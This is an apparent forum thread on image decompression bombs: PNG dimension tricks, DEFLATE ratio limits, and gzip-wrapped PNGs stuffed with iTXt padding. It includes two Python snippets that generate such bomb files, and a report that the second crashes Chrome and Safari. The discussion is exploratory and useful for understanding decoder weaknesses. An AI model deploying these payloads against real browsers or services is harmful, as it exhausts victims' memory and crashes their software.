
I don't think you can do it with JPEG, but you could probably do it with PNG, which uses basically the same compression algorithm as zip (DEFLATE).


There are some stupid tricks you can pull with image formats like emitting the headers for a gigantic image without including enough image data to actually encode the whole image. Most decoders will try to allocate a buffer up front (possibly as much as 16 GB for a 65535x65535 image!) before discovering that the image is truncated.

The same trick works with PNG, actually. Possibly even better: it uses a pair of 32-bit integers for the resolution.
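As a rough illustration of that truncated-header trick (a sketch, not tested against any particular decoder): the snippet below emits a syntactically valid PNG whose IHDR claims a 100000x100000 RGBA image (roughly 40 GB decoded), while the file itself is only a few dozen bytes.

```python
import struct
import zlib

def chunk(ctype: bytes, data: bytes) -> bytes:
    # A PNG chunk: 4-byte big-endian length, type, data, CRC32 over type+data.
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data)))

# IHDR claims 100000x100000, 8-bit depth, color type 6 (RGBA):
# ~40 GB if a decoder allocates the full buffer up front.
ihdr = struct.pack(">IIBBBBB", 100_000, 100_000, 8, 6, 0, 0, 0)

png = (b"\x89PNG\r\n\x1a\n"              # PNG signature
       + chunk(b"IHDR", ihdr)
       + chunk(b"IDAT", zlib.compress(b"\x00"))  # far too little pixel data
       + chunk(b"IEND", b""))

print(len(png))  # the whole "40 GB image" fits in well under 100 bytes
```

Whether this actually triggers a giant allocation depends on the decoder; well-behaved libraries cap dimensions or allocate per-scanline.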


Deflate allows a maximum compression ratio of 1000:1 or thereabouts.

Considering I’ve seen real-world JPEGs above 300:1 (https://eoimages.gsfc.nasa.gov/images/imagerecords/73000/739...), I would not be surprised if you could craft a JPEG getting very close to, or exceeding, four digits.


The reason it doesn't work with JPEG is that JPEG isn't a description of individual pixels, but rather of how you'd calculate what each pixel should be. That's part of the reason you can progressively load JPEG data.

PNG, by contrast, is a description of the RGB value of each individual pixel. That's why I believe you could PNG-bomb: a 2-billion-by-2-billion black-pixel image would ultimately eat up a huge amount of GPU and system memory to decode.

Perhaps something similar is possible with JPEG, but it has nothing to do with the compression itself: JPEG caps dimensions at 65,535×65,535, which would keep you from exploding them.


DEFLATE can only obtain a best-case compression ratio approaching 1032:1. (Put the byte to repeat in a preceding block, and set "0" = 256 and "1" = 285 for the literal/length code and "0" = 0 for the distance code. Then "10" will output 258 bytes.) This means a 2 Gpx × 2 Gpx PNG image will still be at least ~3.875 PB.
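That limit is easy to approach empirically. A quick sanity check using Python's zlib (a DEFLATE implementation; real encoders fall slightly short of the theoretical 1032:1 because of block and Huffman-table overhead):

```python
import zlib

raw = b"\x00" * 10_000_000           # 10 MB of a single repeated byte
comp = zlib.compress(raw, level=9)   # best-effort DEFLATE
ratio = len(raw) / len(comp)
print(f"{len(comp)} bytes compressed, ratio about {ratio:.0f}:1")
```

The ratio lands close to, but never above, 1032:1, since every length/distance pair costs at least 2 bits and emits at most 258 bytes.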

If you send it compressed over the wire, you could get another factor of 1032, or perhaps more depending on which algorithms the client supports. Also, you could generate it on demand as a data stream. But these run the risk of the client stopping the transfer before ever trying to process the image.


You can with PNG, but you have to set a high pixel resolution and most viewers have hard limits before it gets too crazy.


Is there a reason the malicious part of the payload has to be pixels? You could have a 100x100px image with thousands of 2GB iTXt chunks, no? That would bypass naive header checks that only reject based on canvas size.


You'd probably use zTXt chunks, right? But regardless, I'd guess that nothing would cause a renderer to actually read that chunk.


The iTXt chunk can also be compressed <https://www.w3.org/TR/png/#10CompressionOtherUses>.


Ah yes, that makes sense.

However, it may work with the article's process: a 100x100 PNG with lots of 2GB-of-nothing iTXt chunks could be gzipped and served with `Content-Encoding: gzip`. It would pass the "is a valid PNG" and "not pixel-huge image" checks but still require full decompression in order to view it.
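A rough sketch of that idea (the 10 MB chunks here are stand-ins for readability; a real iTXt chunk can carry up to 2^31-1 bytes): build a valid 1x1 PNG, pad it with iTXt chunks of repeated bytes, and gzip the whole thing for the wire.

```python
import gzip
import struct
import zlib

def chunk(ctype: bytes, data: bytes) -> bytes:
    # A PNG chunk: 4-byte big-endian length, type, data, CRC32 over type+data.
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data)))

# A valid 1x1 8-bit grayscale PNG; the scanline is a filter byte + one pixel.
ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
idat = zlib.compress(b"\x00\x00")

# iTXt layout: keyword NUL, compression flag, compression method,
# language tag NUL, translated keyword NUL, then the text itself.
itxt = b"Comment\x00\x00\x00\x00\x00" + b"A" * 10_000_000

png = (b"\x89PNG\r\n\x1a\n"
       + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat)
       + 5 * chunk(b"iTXt", itxt)          # ~50 MB of padding
       + chunk(b"IEND", b""))

wire = gzip.compress(png, compresslevel=9)  # what Content-Encoding: gzip sends
print(f"{len(png)} bytes of PNG, {len(wire)} bytes on the wire")
```

The repeated padding compresses by roughly three orders of magnitude, so a multi-gigabyte "valid 1x1 PNG" fits in a few megabytes of transfer.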


Firefox seems to handle this correctly: it reads the first part of the image and displays it, but stops decompressing after the full image file is read.

Chrome and Safari both crash after using up all available OS memory on the task (Safari crashes earlier and less badly because it has a per-page memory limit).



